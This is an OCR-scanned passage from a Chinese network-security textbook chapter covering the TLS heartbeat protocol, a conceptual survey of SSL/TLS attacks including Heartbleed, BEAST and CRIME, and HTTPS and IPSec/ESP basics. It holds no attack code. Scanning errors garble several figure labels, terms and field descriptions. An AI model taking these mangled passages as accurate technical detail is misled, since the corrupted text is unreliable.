heartbeat_request 消息 可 以 随时 发 送 。 每 当 接收 到 请 求 消息 时 ， 都 应 当 及 时 地 以 相应 的 
heartbeat response 消息 给 予 回答 。heartbeat request 消息 包含 载荷 的 长 度 、 载 荷 (payload) 和 填 
充 字段 。 载 荷 是 长 度 在 16 字 节 到 64k 字 节 之 间 的 一 段 随机 内 容 。 相 应 的 heartbeat_response 消 
息 必 须 包含 接收 到 的 载荷 的 一 个 准确 的 拷贝 。 填 充 字段 中 也 是 随机 的 内 容 。 填 充 字段 使 得 发 送 
方 执行 发 现 一 条 路 径 的 最 大 传输 单元 (maximum transfer unit, MTU) 操作 : 通过 发 送 请 求 不 断 
增 大 填充 直到 接收 不 到 响应 ， 因 为 路 径 上 的 其 中 一 台 主 机 无 法 处 理 该 消息 。 
心跳 (heartbeat) 有 两 个 目的 。 第 一 ， 它 向 发 送 者 确保 接收 端 还 活着 ， 即 使 有 可 能 在 底层 
TCP 连接 上 已 有 一 段 时 间 没 有 任何 活动 。 第 二 ， 心 跳 生成 了 空闲 时 间 段 中 的 活动 连接 ， 以 避免 
被 不 容忍 空闲 连接 的 防火 墙 关闭 掉 。 


对 载荷 交换 的 要 求 被 设计 到 心跳 协议 中 ， 以 支持 其 在 无 连接 的 TLS 版 本 ( 即 DTLS) 中 使 
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用 。 由 于 无 连接 服务 面临 数据 包 丢 失 问题 ， 载 荷 使 得 请 求 者 能 够 将 响应 消息 和 请 求 消息 进行 匹 
配 。 为 了 简单 起 见 ， 相 同 版 本 的 心跳 协议 在 TLS 和 DTLS 中 都 可 以 使 用 ， 因 此 ，TLS 和 DTLS 
都 要 求 有 载荷 。 


22.3.3 SSL/TLS 攻击 


自从 在 1994 年 首次 引入 SSL 及 随后 TLS 标准 化 以 来 ， 针 对 这 些 协议 的 许多 攻击 已 被 设计 
出 来 。 每 个 攻击 的 出 现 都 迫使 协议 、 使 用 的 加 密 工 具 或 者 SSL 和 TLS 实现 的 某 些 方面 进行 改 
进 ， 以 应 对 这 些 威胁 。 

攻击 类 型 ”我们 可 以 把 相关 的 攻击 分 成 如 下 4%: 

e 握手 协议 攻击 : 早 在 1998 年 ， 一 种 基于 利用 RSA 加 密 方案 的 格式 和 实现 中 的 漏洞 来 

破坏 握手 协议 的 方法 就 已 被 提出 ( [BLEI98])。 随 着 应 对 措施 的 实施 ， 攻 击 也 进行 了 细 
化 和 调整 ， 这 不 仅 阻 碍 了 对 策 实现 也 加 快 了 进攻 速度 (比如 BARD12 )。 
记录 和 应 用 数据 协议 攻击 : 在 这 些 协议 中 已 被 发 现存 在 许多 漏洞 ， 从 而 导致 需要 打 
一 些 补丁 来 应 对 新 的 威胁 。 最 近 的 一 个 例子 是 ， 在 2011 年 ， 研 究 人 员 Thai Duong 和 
Juliano Rizzo 展示 了 一 个 称 为 “BEAST” ( Browser Exploit Against SSL/TLS) 的 概念 验 
证 ， 把 曾经 被 认为 只 有 理论 上 存在 的 漏洞 转化 成 实际 的 攻击 [GOOD11]。“BEAST” 采 
用 了 一 种 称 为 选择 明文 攻击 的 密码 学 攻击 方法 。 攻 击 者 通过 为 与 已 知 密 文 相关 联 的 明 
文选 择 一 个 猜测 进行 攻击 。 该 研究 人 员 开 发 出 一 种 实用 的 算法 来 发 动 成 功 的 攻击 。 随 
后 出 现 的 补丁 能 够 阻止 这 种 攻击 。BEAST 攻击 的 作者 也 是 2012 年 CRIME(Compression 
Ratio Info-leak Made Easy) 攻击 的 创造 者 ，CRIME 攻击 使 得 当 数 据 压缩 和 TLS 一 起 使 
用 时 ， 攻 击 者 能 够 恢复 出 网 络 cookie 的 内 容 ([GOOD12b] )。 
PKI 攻击 : 检查 X.509 证 书 在 遭受 各 种 攻击 时 的 有 效 性 ， 可 以 在 SSL/TLS 中 和 其 他 环 
境 下 进行 。 例 如 ，[GEOR12] 阐明 了 SSL/TLS 通常 使 用 的 库 就 受到 由 于 证 书 验证 实现 
存在 漏洞 所 造成 的 威胁 。 作 者 揭示 了 OpenSSL, GnuTLS, JSSE, ApacheHttpClient, 
Weberknecht, cURL, PHP、Python， 以 及 基于 或 使 用 这 些 程序 的 应 用 程序 源码 中 的 弱点 。 
其 他 攻击 : [MEYE13] 列 出 了 一 些 不 属于 上 述 任何 类 别 的 攻击 。 一 个 例子 就 是 在 2011 
年 宣布 的 由 德国 黑客 组 织 The Hackers Choice 发 起 的 攻击 ， 它 是 一 个 拒绝 服务 攻击 
(DoS attack) [KUMA11]。 该 攻击 通过 利用 大 量 的 SSL/TLS 握手 请 求 在 服务 器 上 产生 沉 
重 的 处 理 负载 ， 导 致 目 标 服务 器 不 能 正常 工作 。 增 加 系统 负载 是 通过 建立 新 的 连接 或 
使 用 重新 协商 来 实现 的 。 假 定 握手 期 间 的 大 部 分 计算 是 由 服务 器 完成 的 ， 该 攻击 在 服 
务 器 上 创造 了 比 原 设备 上 更 多 的 系统 负载 ， 导 致 拒绝 服务 。 服 务 器 被 迫 不 断 地 重新 计 
算 随 机 数 和 密 钥 。 

SSL/TLS 攻击 及 其 对 策 的 发 展 历史 是 其 他 基于 Internet 协议 发 展 过 程 的 代表 。“ 完 美 ” 的 
协议 和 “完美 ”的 实施 策略 永远 无 法 实现 。 威 胁 与 对 策 之 间 的 不 断 反 复 的 过 程 决 定 了 基于 
Internet 协议 的 演变 与 发 展 。 

心脏 出 血 (heartbleed) 最 近 发 现 的 在 TLS 软件 中 的 缺陷 造成 了 一 个 潜在 的 最 具 灾难 性 的 
TLS 漏洞 之 一 。 该 缺陷 存在 于 开源 的 OpenSSL 对 心跳 协议 的 实现 过 程 中 。 需 要 注意 的 是 ， 这 
个 漏洞 不 是 TLS 规范 中 的 设计 缺陷 ， 而 是 在 OpenSSL 库 中 的 一 个 编程 错误 。 

要 了 解 该 漏洞 的 本 质 ， 先 回顾 我 们 之 前 的 讨论 ， 我 们 知道 heartbeat request 消息 包括 载荷 
长 度 、 载 荷 和 填充 字段 。 在 修复 该 缺陷 之 前 ，OpenSSL 版 本 的 心跳 协议 的 工作 方式 如 下 : 该 软 
件 读 取 传 人 的 请 求 消 息 ， 并 分 配 一 个 大 到 足以 容纳 该 消息 首部 、 载 荷 和 填充 字段 的 缓冲 区 ; 然 
后 ， 它 用 传人 的 消息 覆盖 缓冲 区 的 当前 内 容 ， 改变 第 一 字 节 用 以 指出 响应 消息 类 型 ， 然 后 发 送 
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个 响应 消息 ， 其 中 包括 载荷 长 度 字 段 和 载荷 。 但 是 ， 该 软件 并 不 检查 传人 消息 的 消息 长 度 。 
因此 ， 攻 击 者 可 以 发 送 一 条 消息 ， 该 消息 声称 有 最 大 负载 长 度 64KB， 但 其 实 只 包括 最 低 载荷 
16 字 节 。 这 意味 着 将 近 64KB 的 缓冲 又 不 会 被 覆盖 ， 此 时 任何 刚好 在 此 内 存 中 的 内 容 将 发 送 
给 请 求 者 。 反 复 的 攻击 可 导致 在 脆弱 的 系统 上 大 量 的 内 存 中 的 重要 信息 被 泄露 。 图 22-7 A 
了 预期 的 行为 和 心脏 出 血 漏洞 的 实际 行为 。 

这 是 一 个 惊人 的 缺陷 。 原 封 不 动 的 内 存 中 可 能 包含 私 钥 、 用 户 身 份 信息 、 认 证 数据 、 密 码 
或 其 他 人 敏感 数据 。 该 缺陷 存在 了 好 几 年 并 没有 被 发 现 。 尽 管 所 有 实现 中 的 缺陷 最 终 都 得 到 了 修 
复 ， 但 是 大 量 的 敏感 数据 已 被 暴露 到 了 Internet 上 。 因 此 ， 我 们 有 较 长 的 暴露 时 间 和 容易 实现 
的 攻击 ， 而 且 攻 击 不 会 留 下 任何 痕迹 。 从 这 个 缺陷 中 完全 恢复 可 能 需要 数 年 时 间 。 使 问题 更 复 
杂 的 是 ，OpenSSL 是 应 用 最 广泛 的 TLS 实现 。 使 用 OpenSSL 的 TLS 服务 器 包括 金融 、 证 券 
交易 、 个 人 与 企业 电子 邮件 、 社 交 网 络 、 银 行 、 网 上 购物 和 政府 机 构 等 。 据 估计 ， 三 分 之 二 的 
Internet Web 服务 器 都 使 用 了 OpenSSL， 由 此 可 见 该 问题 的 严重 性 ([GOOD14])。 
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a) TLS 心 跳 协议 工作 过 程 b ) 心 EAL TE 


图 22-7 心脏 出 血 漏洞 
来 源 ;“ Heartbleed-The OpenSSL Heartbeat Exploit” Copyright @ 2014 BAE Systems Applied Intelligence. Reprinted 
with permission. 


22.4 HTTPS 


HTTPS (HTTP 建立 在 SSL 之 上 )， 是 指 HTTP 和 SSL 的 组 合 ， 用 以 实现 Web 浏览 器 和 
Web 服务 器 之 间 的 安全 通信 。HTTPS 功能 已 经 在 所 有 的 现代 浏览 器 中 实现 ， 其 应 用 取决 于 
Web 服务 器 是 否 支 持 HTTPS 通信 。 

Web 浏览 器 用 户 所 见 到 的 主要 区 别 是 URL (统一 资源 定位 符 ) 地 址 是 以 https:// 开始 ， 而 
不 是 http://。 一 般 的 HTTP 连接 使 用 80 端口 ， 而 HTTPS 规定 使 用 443 端口 ， 并 调用 SSL. 

一 旦 使 用 HTTPS， 通 信 中 下 列 元 素 将 被 加 密 : 

e 被 请 求 文档 的 URL 

e 文档 的 内 容 

e 浏览 器 表单 的 内 容 (由 浏览 器 用 户 填写 ) 

e 由 浏览 器 发 送 到 服务 器 和 由 服务 器 发 送 到 浏览 器 的 cookie 

e HTTP 头 的 内 容 

在 文献 RFC 2818 中 记录 了 HTTPS, HTTP 建立 在 TLS 之 上 (HTTP overTSL)。 在 SSL 和 
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TSL 上 使 用 HTTP 没有 本 质 的 区 别 ， 两 种 实现 都 称 为 HTTPS。 


22.4.1 连接 开始 


对 于 HTTPS 而 言 ， 代 理 可 以 充当 HTTP 客户 端 ， 也 可 以 充当 TLS 客户 端 。 客 户 端 首先 向 
服务 器 的 一 个 端口 开启 一 个 连接 ， 接 着 发 送 一 个 TLS ClientHello 请 求 ， 开 始 TLS 握手 过 程 。 
TLS 握手 结束 时 ， 客 户 端 可 以 接着 发 出 第 一 个 HTTP 请 求 。 所 有 的 HTTP 数据 作为 TLS 数据 
被 发 送 。 并 且 都 应 该 遵从 正常 的 HTTP 行为 (包括 保持 连接 )。 

我 们 应 该 清楚 ，HTTPS 的 连接 有 三 级 。 在 HTTP 级 ，HTTP 客户 端 向 HTTP 服务 器 请 求 
连接 ， 是 通过 向 下 一 个 最 低层 发 送 连接 请 求实 现 。 典 型 地 ， 下 一 个 最 低层 是 TCP， 但 也 可 以 
是 TLS/SSL。 在 TLS 级 ， 需 建立 一 个 TLS 客户 端 和 TLS 服务 器 端的 会 话 ， 这 个 会 话 在 任何 时 
候 都 可 以 同时 支持 一 个 或 多 个 连接 。 正 如 我 们 看 到 的 ，TLS 请 求 建立 一 个 连接 是 从 在 客户 端的 
TCP 实体 与 TCP 服务 器 间 建 立 TCP 连接 开始 的 。 


22.4.2 ”连接 关闭 


HTTP 客户 端 或 服务 器 是 通过 在 HTTP 记录 中 添加 记录 Connection : Close 来 表明 连接 将 被 
关闭 的 。 这 表明 连接 将 在 该 记录 发 出 之 后 关闭 。 

HTTPS 连接 的 关闭 ， 要 求 关 闭 与 远 端 TLS 对 等 实体 的 连接 ,包括 关闭 正在 使 用 的 TCP 连 
接 。 在 TLS 级 ,恰当 的 关闭 连接 的 方式 是 在 每 一 端 使 用 TLS 警告 协议 发 送 close_notify 警告 消 
息 。TLS 实现 在 关闭 连接 之 前 必须 启动 警告 消息 的 交换 步骤 。TLS 实现 可 以 ， 在 发 送 关 闭 警 
告 消息 之 后 ， 在 无 须 等 待 对 等 实体 发 送 其 管理 警告 消息 的 情况 下 关闭 连接 。 并 产生 一 个 消息 
“incomplete close”。 注 意 ， 这 样 做 的 一 个 实现 可 以 选择 重用 该 会 话 。 这 种 做 法 仅 在 应 用 程序 知 
道 (一 般 是 通过 检测 HTTP 消息 的 边界 值 ) 其 接收 到 所 有 关心 的 数据 时 才 使 用 。 

HTTP 客户 端 也 必须 能 够 处 理 这 样 的 情况 : 在 没有 事先 收 到 close_notify 警告 信息 和 
Connection : close 提示 标志 的 情况 下 ， 正 在 使 用 的 TCP 连接 被 终止 。 这 种 情况 可 能 是 由 于 服务 
的 编程 错误 引起 的 或 者 是 由 于 通信 错误 而 导致 的 连接 中 断 。 然 而 ， 未 宣布 的 TCP 关闭 可 能 会 
导致 某 种 攻击 ， 因 此 在 这 种 情况 发 生 时 客户 端 要 发 出 某 种 安全 警告 。 


22.5 IPv4 和 1IPv6 的 安全 性 
22.5.1 IP 安全 概述 


Internet 团体 在 很 多 应 用 领域 开发 了 专用 安全 机 制 ， 包 括 电子 邮件 (S/MIME) 客户 端 / 服 
务 器 (Kerberos)、Web 访问 (SSL) 及 其 他 应 用 。 然 而 ， 用 户 担心 没有 安全 协议 层 的 应 用 会 有 
一 些 安全 问题 。 例 如 ， 一 个 企业 可 以 采取 一 定 的 方法 运行 一 个 安全 的 、 专 用 的 TCP/P 网 络 ， 
采取 的 方法 有 拒绝 与 不 可 信 站 点 连接 、 对 离开 上 述 企业 的 包 进 行 加 密 和 对 进入 企业 的 包 进 行 认 
证 等 。 通 过 在 IP 级 实现 安全 ， 一 个 组 织 不 仅 能 保证 应 用 安全 机 制 的 网 络 的 安全 ， 也 能 保证 许 
多 没有 安全 机 制 的 网 络 的 安全 。 

为 了 解决 这 些 问题 ，Internet 体系 结构 委员 会 ( Intemet Architecture Board, IAB) 认为 下 一 
代 IP 中 应 该 包含 认证 和 加 密 等 必要 的 安全 特征 ， 这 些 已 经 在 已 发 行 的 IPv6 中 实现 了 。 幸 运 的 
是 ， 这 些 安全 能 力 被 设计 为 在 当前 的 IPv4 和 将 来 的 IPv6 上 都 可 以 使 用 。 这 就 意味 着 供应 商 现 
在 就 可 以 提供 这 些 特征 ， 而 且 现在 他 们 的 产品 中 的 确 具 有 了 一 些 IPSec 的 能 力 。 

了 级 安全 包含 了 三 个 应 用 领域 : 认证 、 机 密 性 和 密 钥 管 理 。 认 证 机 制 确 保 一 个 接收 到 的 
包 ， 的 确 是 报头 上 标识 的 源 地 址 的 参与 实体 发 出 的 。 此 外 ， 认 证 机 制 还 确保 了 包 在 传输 过 程 中 
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没有 被 算 改 。 机 密 性 设备 使 正在 通信 的 结 点 对 消息 加 密 ， 保 证 消息 在 结 点 之 间 的 传输 不 被 第 三 
方 窃听 。 密 钥 管理 设备 主要 与 密 钥 的 安全 交换 相关 。 当 前 版 本 的 IPSec 称 为 IPSecv3， 包 括 认 
证 和 机 密 性 。 密 钥 管 理 是 由 Internet 密 钥 交 换 标准 IKEv2 协议 提供 的 。 

我 们 首先 概述 IPSec (IP Security) 的 体系 结构 。 接 下 来 学 习 一 些 技术 细节 。 附 录 下 回顾 了 
Internet 协议 。 

IPSec 的 应 用 IPSec 提供 了 能 在 LAN、 公 用 和 专用 的 WAN 以 及 Intenet 上 相互 安全 通 
信 的 能 力 。 它 的 用 途 包括 如 下 方面 : 

e 分 支 机 构 通过 Internet 安全 接 入 : 一 个 公司 可 以 在 Internet 上 或 公共 WAN 上 建立 一 个 
安全 的 虚拟 专用 网 络 。 这 使 得 一 个 公司 更 依赖 于 Internet 并 减少 对 专用 网 的 需求 ， 从 而 
节约 成 本 和 网 络 管理 费用 。 

o 通过 Internet 进行 安全 远程 访问 : 这 使 得 使 用 IPSec 协议 的 终端 用 户 可 以 在 本 地 向 
Internet 服务 提供 商 (ISP) 提出 请 求 ， 以 获得 对 公司 网 络 的 安全 访问 权 。 这 减少 了 出 差 
员工 和 远程 通信 者 的 费用 。 

© 与 合作 伙伴 建立 企业 间 联 网 和 企业 内 部 联网 接 入 : 使 用 IPSec 可 以 在 各 个 组 织 之 间 实 
现 安全 的 通信 ， 确 保 认 证 和 机 密 性 ， 并 提供 密 钥 交换 机 制 。 

e 加 强 电子 商务 安全 : 尽管 一 些 Web 站 点 和 电子 商务 应 用 已 经 内 置 了 安全 协议 ， 但 是 
IPSec 的 使 用 将 提高 这 些 应 用 的 安全 性 。 

使 得 IPSec 能 够 支持 这 些 不 同安 全 应 用 的 基本 特性 是 ， 它 能 在 P 层 对 所 有 的 流量 进行 加 
密 和 认证 。 因 此 ， 这 样 能 保证 所 有 分 布 式 应 用 ， 包 括 远 程 登录 、 客 户 端 /服务 器 、 电 子 邮件 、 
文件 传输 和 Web 访问 等 都 是 安全 的 。 图 9-4 是 一 个 IPSec 的 典型 应 用 场景 。 

IPSec 的 优点 ”IPSec 的 优点 包括 以 下 几 个 方面 : 

o 当 把 IPSec 应 用 到 防火 墙 或 路 由 器 时 ， 它 将 对 通过 边界 的 所 有 通信 流 提供 强 有 力 的 保 

护 。 在 公司 或 工作 组 内 部 的 通信 不 会 产生 与 安全 相关 的 开销 。 

© 如 果 所 有 的 外 部 流量 必须 使 用 IP 且 防 火 墙 是 由 Internet 进入 组 织 内 部 的 唯一 人口， 则 
在 防火 墙 内 的 IPSec 难以 被 绕 过 。 

e IPSec 在 传输 层 (TCP. UDP) 之 下 ， 对 所 有 应 用 都 是 透明 的 。 当 IPSec 应 用 到 防火 墙 

或 路 由 器 上 时 ， 不 需要 对 用 户 系统 和 服务 器 系统 的 软件 做 任何 改动 。 即 使 终端 系统 中 
使 用 IPSec， 上层 软 件 ， 包 括 应 用 软件 ， 也 将 不 会 受到 影响 。 

IPSec 对 终端 用 户 是 透明 的 ， 这 就 不 必 对 用 户 进 行 安全 机 制 的 培训 ， 如 发 放 基于 每 个 用 
户 的 密 钥 资料 (keying material)， 或 当 用 户 离开 该 组 织 时 撤销 密 钥 资料 。 

如 果 有 必要 ，IPSec 可 以 为 个 人 用 户 提 供 安全 。 这 对 网 外 员工 有 用 ， 对 在 组 织 内 部 为 一 
些 敏感 的 应 用 建立 一 个 安全 的 专用 网 络 也 是 非常 有 用 的 。 

路 由 应 用 ”除了 支持 终端 用 户 和 保护 上 述 提 到 的 系统 和 网 络 外 ，IPSec 在 网 络 互 连 所 需 的 
路 由 体系 结构 中 扮演 了 一 个 非常 关键 的 角色 。[HUIT98] 表 列 出 了 使 用 IPSec 的 例子 。IPSec 可 
以 保证 : 

e 路 由 广播 (新 的 路 由 器 公告 它 的 存在 ) 来 自 于 授权 的 路 由 器 。 

e 邻居 广播 (路 由 器 试图 建立 或 维护 与 其 他 的 路 由 区 域 中 的 路 由 器 的 邻居 关系 ) 来 自 于 授 

权 的 路 由 器 。 

e 重 定向 消息 来 源 于 初始 数据 包 所 发 送 到 的 路 由 器 。 

e 路 由 更 新 无 法 伪造 。 

如 果 没 有 这 些 安全 措施 ， 攻 击 者 就 可 以 阻 断 通信 或 者 转移 某 些 流量 。 路 由 协议 〈 比 如 
OSPF) 应 该 在 由 IPSec 定义 的 路 由 器 间 安 全 关联 上 运行 。 
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22.5.2 IPSec 的 范围 


IPSec 提供 了 两 种 主要 的 功能 : 一 是 被 称 作 封装 安全 载荷 ( Encapsulating Security Payload, 
ESP) 的 认证 /加 密 组 合 功 能 ; 二 是 密 钥 交 换 功 能 。 对 虚拟 专用 网 络 而 言 ， 认 证 和 加 密 通常 都 
是 要 求 的 ， 因 为 它 对 (1) 保证 非 授权 用 户 不 能 渗透 虚拟 专用 网 和 (2) 保证 Intenet 上 的 窃听 
者 不 能 读 取 虚拟 专用 网 上 发 送 的 消息 都 是 非常 重要 的 。 此 外 ， 还 有 一 个 仅 认证 功能 ， 使 用 认证 
HRA (Authentication Header, AH) 来 实现 。 由 于 消息 认证 是 由 ESP 提供 的 ，AH 的 使 用 已 被 废 
弃 。 所 以 为 保持 向 后 兼容 性 ， 它 是 包含 在 IPsecv3 中 的 ， 但 不 应 使 用 于 新 的 应 用 程序 。 本 章 我 
们 不 讨论 AH。 

密 钥 交 换 功 能 允许 手动 交换 密 钥 ， 也 允许 自动 交换 密 钥 。 

IPSec 说 明 书 非常 复杂 且 包 含 大 量 文档 。 最 重要 的 是 RFC 2401, RFC 4302, RFC 4303 和 
RFC 4306。 这 一 节 我 们 将 对 IPSec 的 一 些 要 素 进行 概 述 。 


22.5.3 ”安全 关联 


在 IP 的 认证 和 机 密 性 机 制 中 出 现 的 一 个 核心 概念 是 安全 关联 (Security Association, SA). 
关联 是 发 送 方 和 接收 方 之 间 的 单 向 关系 ， 该 关联 为 两 者 间 的 通信 流 提供 安全 服务 。 如 果 需 要 双 
向 安全 关联 ， 则 需要 建立 两 个 安全 关联 。 安 全 服务 可 以 使 用 ESP 来 提供 SA。 
一 个 安全 关联 由 如 下 三 个 参数 唯一 确定 : 
e 安全 参数 索引 (Security Parameters Index, SPI): 一 个 分 配给 SA HIB, EMER 
地 有 意义 。 该 SPI 由 ESP 报头 携带 ， 使 得 接收 系统 能 选择 合适 的 SA， 接收 到 的 包 将 在 
该 SA 下 处 理 。 

e IP 目的 地 址 (IP destination address): 目前 ， 只 人 允许 使 用 单 播 (unicast) 地 址 ， 这 是 
SA 的 目的 端的 地 址 ， 目 的 端 可 以 是 终端 用 户 系统 ， 或 者 是 像 防 火 墙 或 路 由 器 的 网 络 
系统 。 

© 协议 标识 (protocol identifier): 它 标 识 该 关联 是 否 是 一 个 AH 安全 关联 或 ESP 安全 关联 。 

因此 ， 在 任何 外 包 中 ， 安 全 关联 由 IPv4 或 IPv6 报头 中 的 目的 地 址 和 扩展 头 部 (AH 或 
ESP) 中 的 SPI 唯一 标识 。 

在 每 一 个 IPSec 实现 中 ， 有 一 个 安全 关联 数据 库 ( SAD)， 它 定义 每 个 与 SA 相关 的 参数 。 

一 个 安全 关联 通常 由 如 下 参数 定义 : 

© 序列 号 计数 器 ( sequence number counter): 一 个 32 比特 的 数值 ， 它 被 用 来 生成 AH 或 
ESP 报头 中 序列 号 域 。 
序列 计数 器 溢出 (sequence counter overflow): 这 是 一 个 标识 ， 用 于 表示 序列 号 计数 器 
溢出 是 否 应 该 生成 一 个 可 审计 的 事件 ， 并 且 阻 止 在 此 SA 上 继续 传输 包 。 
© 反 重 放 窗口 (anti-replay window): 用 于 判定 一 个 到 达 的 AH 或 ESP 数据 包 是 否 是 重 放 。 

采取 的 方法 是 定义 一 个 变化 的 窗口 ， 其 内 的 序列 号 必须 是 递减 的 。 
e AH 信息 (AH inforamtion): 认证 算法 、 密 钥 、 密 钥 生 存 期 和 AH 用 到 的 相关 参数 。 
e ESP 信息 (ESP information): 加 密 和 认证 算法 、 密 钥 、 初 始 值 、 密 钥 生存 期 和 ESP 用 
到 的 相关 参数 。 
安全 关联 的 生存 期 ( lifetime of this security association): 一 个 时 间 间 隔 或 者 字 节 计 数 。 
超过 此 值 后 ,一 个 SA 必须 被 一 个 新 的 SA (和 新 的 SPI) 代替 或 者 结束 ， 并 加 上 这 些 动 
作 将 发 生 的 指示 。 
IPSec 协议 模式 (IPSec protocol mode) : 隧道 模式 、 传 输 模 式 或 者 通配符 模式 (在 所 有 
的 实现 中 均 需 要 )。 这 些 模式 将 在 后 续 的 章节 中 进行 详细 的 讨论 。 
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。 最 大 传输 单元 路 径 ( path MTU): 最 大 传输 单元 (不 需要 进行 分 段 传输 的 最 大 包 长 度 ) 
BEANIE tt EE 
分 发 密 钥 所 使 用 的 密 钥 管理 机 制 只 能 通过 安全 参数 索引 将 认证 和 保密 机 制 相 结合 。 因 此 认 
证 和 保密 机 制 管理 被 规定 为 与 任何 关键 的 安全 管理 机 制 无 关 。 


22.5.4 ”封装 安全 载荷 


封装 安全 载荷 ( Encasulating Security Payload，ESP) 提供 保密 服务 ， 包 括 消 息 内 容 保密 和 
流量 限制 保密 。 作 为 可 选 的 特性 ，ESP 还 可 以 提供 认证 服务 。 
图 22-8 给 出 了 ES 包 的 格式 。 它 包 


括 如 下 域 ， 位 : 0 16 24 31 

o 安全 参数 索引 (security parameter | 
indad) (as GA | bee ee ee 
关联 。 m 

© 序列 号 (sequence number)( 32 位 ): 出 载荷 数据 ( 可 变 ) 
一 个 单调 递增 计数 值 。 a 

e 载荷 数据 (payload data) (可 变 ) : | 填充 (0-235 ) -一 一 
这 是 一 个 传输 层 的 段 (传输 模式 ) | 
或 者 卫 包 ， 它 是 通过 加 密 进 行 认证 数据 (可 变 ) 





保护 的 。 

填充 ( padding) (0 ~ 255 位 ): 
如 果 加 密 算法 要 求 明文 是 一 些 8 位 字 节 的 整数 倍 时 可 能 需要 。 

o 填充 长 度 (pad length)( 8 fz): 在 域 前 标明 此 域 填充 数据 的 长 度 。 

邻接 报头 (next header): 通过 标识 载荷 中 的 第 一 个 报头 来 标识 包含 在 载荷 数据 域 中 的 
数据 类 型 (如 IPv6 中 的 扩展 报头 或 如 TCP 这 样 的 上 层 协议 等 )。 

认证 数据 (可 变 ) (authentication data ( variable ) ) : 一 个 可 变 长 的 域 (必须 为 32 位 字 
长 的 整数 倍 )， 它 包含 完整 性 校 验 值 ( Integrity Check Value, ICV). ICV 的 计算 参量 为 
ESP 包 中 除 认 证 数据 外 的 其 他 部 分 。 


22.5.5 ”传输 模式 和 隧道 模式 


ESP 支持 两 种 使 用 模式 : 传输 模式 和 隧道 模式 。 接 下 来 我 们 先 给 出 一 个 简要 的 概述 。 

传输 模式 ”传输 模式 主要 是 针对 上 层 的 ( upper-layer) 协议 提供 保护 ， 也 就 是 说 ， 传 输 模 
式 将 保护 扩展 到 人 P 包 的 载荷 。 例 子 包括 TCP 段 或 者 UDP 段 ， 它 们 在 主机 协议 栈 中 运行 在 IP 
层 之 上 。 一 般 ， 传 输 模式 用 于 主机 之 间 端 到 端的 通信 (例如 ， 客 户 端 与 服务 器 之 间或 者 两 个 
工作 站 之 间 )。 当 一 台 主 机 在 IPv4 上 运行 ESP 时 ， 载 荷 通 常 是 直接 在 卫 头 之 后 。 对 于 IPv6， 
载荷 则 通常 紧 跟 着 IP SLA IPv6 扩展 头 出 现 ， 可 能 会 被 加 密 保护 ， 而 目的 选择 头 可 能 是 一 个 
例外 。 

ESP 在 传输 模式 下 会 对 IP 载荷 加 密 和 有 选择 地 进行 认证 ， 但 对 IP 头 不 进行 相应 处 理 。 

隧道 模式 ”隧道 模式 是 对 整个 IP 包 提供 保护 。 为 了 实现 该 目标 ， 在 ESP RME PAS 
后 ,将 整个 包 和 安全 域 作 为 一 个 新 的 带 有 新 的 外 部 IP 头 的 外 部 IP 包 的 载荷 处 理 。 整 个 原来 的 
(内 部 的 ) 包 会 通过 一 个 隧道 从 IP 网 络 的 一 个 结 点 流转 到 另 一 个 结 点 。 在 其 转移 的 路 线 上 没有 
路 由 器 会 检查 其 内 部 IP 头 。 因 为 原始 的 包 被 封装 成 一 个 新 的 、 更 大 的 包 ， 这 个 包 具 有 与 原来 


图 22-8 IPSec ESP 格式 


的 包 根 本 不 同 的 源 地 址 和 目标 地 址 ， 从 而 增加 了 安全 性 。 当 安全 关联 中 一 个 或 两 个 都 是 安全 网 
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关 时 ， 例 如 在 防火 墙 或 者 路 由 器 实现 IPSec 功能 时 ， 就 可 以 使 用 隧道 模式 。 在 隧道 模式 下 ， 防 
火 墙 之 后 的 网 络 中 的 大 多 数 主机 ， 缘 可 以 进行 安全 通信 ， 而 无 须 实现 IPsec。 主 机 产生 的 未 被 
保护 的 包 在 外 部 网 络 中 采用 隧道 模式 流转 ， 安 全 关联 由 在 局 域 网 边缘 的 防火 墙 或 安全 路 由 器 中 
的 IPSec 软件 创建 。 

下 面 是 隧道 模式 的 IPSec 如 何 运行 的 例子 。 网 络 的 一 台 主 机 A 产生 了 一 个 IP 包 ， 其 目标 
地 址 是 另 一 个 网 络 中 主机 B。 这 个 包 选 择 了 从 原来 的 主机 A 到 所 在 网 络 的 边界 的 一 台 防 火 墙 
或 安全 路 由 器 的 流转 路 径 。 防 火 墙 过 滤 所 有 流出 的 包 以 确定 对 其 进行 IPSec 处 理 。 如 果 A 到 B 
的 包 需 要 使 用 IPSec， 防 火 墙 对 其 进行 IPSec 处 理 ， 并 用 外 部 IP 头 对 其 进行 封装 ， 这 个 外 部 P 
包 的 源 地 址 是 这 台 防 火 墙 ， 目 标 地 址 可 能 是 B 所 在 局 域 网 的 边缘 防火 墙 。 这 个 封装 好 的 包 就 
选择 能 够 到 达 B 的 防火 墙 的 路 径流 转 中 经 过 的 路 由 器 只 检查 其 外 部 IP 头 。 在 B 的 防火 墙 ， 
外 部 IP 包头 被 去 除 ， 内 部 包 被 发 送 到 主机 B。 

ESP 在 隧道 模式 下 会 对 整个 人 P 包 (包括 全 头 ) 加 密 和 有 选择 地 进行 认证 。 


22.6 ”推荐 读物 


本 章 所 讨论 的 主题 在 [STAL14a] 中 有 更 详细 的 讲述 。[LEIB07] 给 出 了 一 个 有 关 DKIM 的 
概述 。[POLK13] 研究 了 TLS 安全 实现 的 安全 要 求 。[SARK13] 和 [MEYE13] 是 最 近 的 关于 
SSL/TLS 攻击 和 避免 攻击 方法 的 非常 有 用 的 综述 文献 。[CHEN98] 对 IPSec 设计 问题 进行 了 很 
好 的 讨论 。 

CHEN98 Cheng, P.. et al. “A Security Architecture for the Internet Protocol.” IBM 
Systems Journal, Number 1, 1998. 

LEIB07 Leiba. B.. and Fenton, J. “DomainKeys Identified Mail (DKIM): Using 
Digital Signatures for Domain Verification.” Proceedings of Fourth 
Conference on E-mail and Anti-Spam (CEAS 07), 2007. 

MEYE13 Meyer. C.; Schwenk, J.; and Gortz, H. “Lessons Learned From Previous SSL/ 
TLS Attacks A Brief Chronology Of Attacks And Weaknesses.” Cryptology 
ePrint Archive, 2013. http://eprint.iacr.org/2013/ 

POLKI3 Polk, T.; Chokhani, S.; and McKay, K. Guidelines for the Selection, 
Configuration, and Use of Transport Layer Security (TLS) Implementation. 
NIST Special Publication 800-52 (Draft), September 2013. 

SARK13 Sarkar, P., and Fitzgerald, S. “Attacks on SSL: A Comprehensive Study of 
BEAST, CRIME. TIME, BREACH, LUCKY 13. & RC4 Biases.” iSECpart- 
